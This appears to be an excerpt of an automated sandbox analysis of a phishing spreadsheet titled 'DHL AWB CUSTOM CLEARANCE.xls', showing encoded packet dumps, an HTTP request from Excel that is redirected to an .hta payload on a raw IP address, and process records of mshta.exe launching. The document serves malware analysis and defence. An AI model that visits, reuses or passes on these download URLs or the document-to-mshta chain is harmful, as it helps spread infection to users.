                          Jan 14, 2025 19:22:38.621941090 CET1236INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                          Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                          Jan 14, 2025 19:22:38.621975899 CET448INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                          Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%6f%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                          Jan 14, 2025 19:22:38.622009039 CET1236INData Raw: 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                          Data Ascii: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0
                          Jan 14, 2025 19:22:38.622044086 CET1236INData Raw: 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                          Data Ascii: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0
                          Jan 14, 2025 19:22:38.622077942 CET1236INData Raw: 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                          Data Ascii: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0
                          Jan 14, 2025 19:22:38.622112036 CET1236INData Raw: 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                          Data Ascii: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0
                          Jan 14, 2025 19:22:38.622145891 CET1236INData Raw: 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                          Data Ascii: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0
                          Jan 14, 2025 19:22:38.622179985 CET1236INData Raw: 63 25 35 36 25 36 62 25 36 39 25 32 63 25 37 38 25 37 61 25 36 63 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                          Data Ascii: c%56%6b%69%2c%78%7a%6c%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0
                          Jan 14, 2025 19:22:38.622215033 CET1236INData Raw: 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                          Data Ascii: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%65%37%47%56%2d%54%58%71%57%4c%49%30%50%65%09%09%09%09%09%09%09%09%09%09%09%09%0
                          Jan 14, 2025 19:22:38.627101898 CET1236INData Raw: 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39
                          Data Ascii: 9%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.44975314.103.79.104437636C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          TimestampBytes transferredDirectionData
                          2025-01-14 18:22:37 UTC251OUTGET /hANTnNH4?&astrology=wet%20&abolishment=scintillating&pavement HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                          Host: s.deemos.com
                          Connection: Keep-Alive
                          2025-01-14 18:22:38 UTC457INHTTP/1.1 302 Found
                          Date: Tue, 14 Jan 2025 18:22:37 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 98
                          Connection: close
                          X-DNS-Prefetch-Control: off
                          X-Frame-Options: SAMEORIGIN
                          Strict-Transport-Security: max-age=15724800; includeSubDomains
                          X-Download-Options: noopen
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          Location: http://131.226.2.34/xampp/meno/clearpciturewithhersheisverybeautifulgirl.hta
                          Vary: Accept
                          2025-01-14 18:22:38 UTC98INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 33 31 2e 32 32 36 2e 32 2e 33 34 2f 78 61 6d 70 70 2f 6d 65 6e 6f 2f 63 6c 65 61 72 70 63 69 74 75 72 65 77 69 74 68 68 65 72 73 68 65 69 73 76 65 72 79 62 65 61 75 74 69 66 75 6c 67 69 72 6c 2e 68 74 61
                          Data Ascii: Found. Redirecting to http://131.226.2.34/xampp/meno/clearpciturewithhersheisverybeautifulgirl.hta


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:13:21:43
                          Start date:14/01/2025
                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                          Imagebase:0x420000
                          File size:53'161'064 bytes
                          MD5 hash:4A871771235598812032C822E6F68F19
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:6
                          Start time:13:22:37
                          Start date:14/01/2025
                          Path:C:\Windows\SysWOW64\mshta.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                          Imagebase:0xc30000
                          File size:13'312 bytes
                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:false

                          Target ID:8
                          Start time:13:22:47
                          Start date:14/01/2025
                          Path:C:\Windows\splwow64.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\splwow64.exe 12288
                          Imagebase:0x7ff7dad60000
                          File size:163'840 bytes
                          MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:12
                          Start time:13:23:02
                          Start date:14/01/2025
                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\DHL AWB CUSTOM CLEARANCE.xls"
                          Imagebase:0x420000
                          File size:53'161'064 bytes
                          MD5 hash:4A871771235598812032C822E6F68F19
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          No disassembly